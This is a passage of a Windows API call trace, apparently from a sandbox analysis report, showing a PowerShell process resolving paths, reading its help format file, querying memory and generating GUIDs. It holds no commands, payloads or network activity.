lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.467] VirtualQuery (in: lpAddress=0xcbb60, lpBuffer=0xcca20, dwLength=0x30 | out: lpBuffer=0xcca20*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.468] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x5beacc05, Data2=0x4ed6, Data3=0x4d60, Data4=([0]=0xba, [1]=0xc5, [2]=0x26, [3]=0x4d, [4]=0x9f, [5]=0xee, [6]=0x37, [7]=0x54))) returned 0x0 [0135.468] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, 
RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.470] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x9a1a9312, Data2=0x4197, Data3=0x4340, Data4=([0]=0xbf, [1]=0x35, [2]=0xd0, [3]=0x10, [4]=0xdd, [5]=0x36, [6]=0xd4, [7]=0x8e))) returned 0x0 [0135.471] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xd2069267, Data2=0x2b47, Data3=0x40b2, Data4=([0]=0x8d, [1]=0x97, [2]=0xac, [3]=0x3f, [4]=0x28, [5]=0x7a, [6]=0x76, [7]=0x9a))) returned 0x0 [0135.471] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xd3d3f4f3, Data2=0xe2b2, Data3=0x480f, Data4=([0]=0x8d, [1]=0xce, [2]=0x34, [3]=0xcf, [4]=0x45, [5]=0xbc, [6]=0x64, [7]=0xfe))) returned 0x0 [0135.471] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.472] VirtualQuery (in: lpAddress=0xcbca0, lpBuffer=0xccb60, dwLength=0x30 | out: lpBuffer=0xccb60*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0135.473] SetErrorMode (uMode=0x1) returned 0x1 [0135.473] SetErrorMode (uMode=0x1) returned 0x1 [0135.473] GetFileType (hFile=0x308) returned 0x1 [0135.473] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.475] ReadFile (in: hFile=0x308, 
lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.475] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.475] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.476] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.476] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.476] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.476] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.477] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.477] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) 
returned 1 [0135.477] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.477] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.477] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.478] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.478] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.479] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.480] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.480] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.480] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, 
lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.480] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.480] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.480] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.480] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.481] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.481] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.481] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.481] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.481] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, 
lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.481] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.481] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.482] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.482] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.483] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.484] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.484] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.484] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.484] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, 
nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.484] ReadFile (in: hFile=0x308, lpBuffer=0x353ee80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x353ee80*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0135.485] SetErrorMode (uMode=0x1) returned 0x1 [0135.485] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccfe0 | out: lpFileInformation=0xccfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0135.486] SetErrorMode (uMode=0x1) returned 0x1 [0135.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0135.486] CoTaskMemAlloc (cb=0x5a) returned 0x1b80a970 [0135.486] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd01c, lpData=0x1b80a970, lpcbData=0xcd018*=0x56 | out: lpType=0xcd01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd018*=0x56) returned 0x0 
[0135.486] CoTaskMemFree (pv=0x1b80a970) [0135.486] RegCloseKey (hKey=0x308) returned 0x0 [0135.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0135.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0135.494] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xdab88247, Data2=0x4de8, Data3=0x45cd, Data4=([0]=0x9a, [1]=0xa0, [2]=0x62, [3]=0x8d, [4]=0x29, [5]=0xa1, [6]=0x1d, [7]=0x88))) returned 0x0 [0135.494] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0xf9fe0b0a, Data2=0x7ee1, Data3=0x4f11, Data4=([0]=0xb6, [1]=0xbb, [2]=0x6e, [3]=0xe7, [4]=0x13, [5]=0x73, [6]=0x5a, [7]=0xad))) returned 0x0 [0135.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.494] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.552] CoCreateGuid (in: pguid=0xcd2f0 | out: 
pguid=0xcd2f0*(Data1=0x758b44bc, Data2=0x76, Data3=0x45a2, Data4=([0]=0xad, [1]=0xa2, [2]=0x9f, [3]=0x5, [4]=0xa2, [5]=0x4a, [6]=0x22, [7]=0xaf))) returned 0x0 [0135.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe80, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0135.556] VirtualQuery (in: lpAddress=0xcb300, lpBuffer=0xcc1c0, dwLength=0x30 | out: lpBuffer=0xcc1c0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.557] VirtualQuery (in: lpAddress=0xcb390, lpBuffer=0xcc250, dwLength=0x30 | out: lpBuffer=0xcc250*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.558] GetFullPathNameW (in: 
